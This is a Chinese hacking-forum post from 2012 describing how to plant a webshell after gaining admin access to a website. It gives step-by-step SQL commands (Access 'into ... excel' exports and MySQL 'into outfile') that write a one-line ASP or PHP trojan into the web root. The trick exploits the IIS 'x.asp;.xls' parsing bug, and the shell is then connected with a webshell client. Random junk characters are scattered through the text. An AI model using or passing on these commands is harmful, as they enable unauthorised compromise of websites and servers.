好不容易进了后台,发现啥上传啊。备份啊多木有。. F7 ~# T* r/ ?" k. k4 B& K' w
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的0 A* n+ o+ c" K
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,7 Y' ]/ ]' E3 @5 d ]
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:$ t2 ]0 E9 t' i& p; q. w9 M
1.create table cmd (a varchar(50))
3 b4 \# L+ Z/ ^( `2.insert into cmd (a) values (‘‘)
/ `8 _1 Q0 w* u/ c3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd. A( ?( ^! Z. A8 f7 @
(把表cmd的内容导出为物理路径的一个EXCEL文件)( L' |5 t# K1 B
4.drop table cmd
. ~* U- [/ l+ U. n% v! H利用IIS的BUG成功拿到了WEBSHELL。
, Y$ }7 F0 w+ k5 W: v5 o
; f# w5 Q5 b! L! s直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
* X4 N! z) _! m5 c# R6 C8 E7 S+ n: ~" W1 X$ F! k+ |% k0 H
SQL语句意思解释:. Q+ f; p" m* x5 p1 ~
第一句3 Y0 E2 C1 Y7 r' P. B
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
" ?, N" `* ~% H1 T8 Q* t U
/ c' Z [5 g- t 第二句
, [5 r, E+ g% [# A; q! C 在表cmd的a字段插入一句话木马8 P' |; z3 K! D; [5 F q! O
第三句 i. o$ a1 l7 M( q$ {, B6 @3 S
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件- ?$ {/ ?5 f' K! a, l7 D
9 Z' ^' X) A! v/ Q& P
第四句
9 g/ j8 ~2 {: o. V% m 删除建立的cmd表$ e. a1 U' o4 I& ~1 F M
# F' [1 y( t/ t& S0 p
以下内容为测试:
3 {! }6 [5 i" Y Access利用后台SQL执行命令功能导出WebShell:
4 I0 o& w! T: |! k 这个更简单:
7 V+ S3 v) }6 E6 [3 H! _ [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
4 n+ t1 U8 A" ^4 x6 e" q' R 或者8 K$ o) [5 A# d. m9 b4 T! @
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
( X7 A6 N, Q0 V' b* T
! ]+ D- q( j- w/ s }( V) Y' `* e: X3 ] 后台有执行SQL语句功能(vote为已知表段)+ v, H' y$ M9 M! i: B2 p) v
希望对大家有所帮助拿shell的又一个思路1 O/ ?4 E( A# x8 V* B5 i
|
发表于 2012-9-13 17:53:58
收藏
支持
反对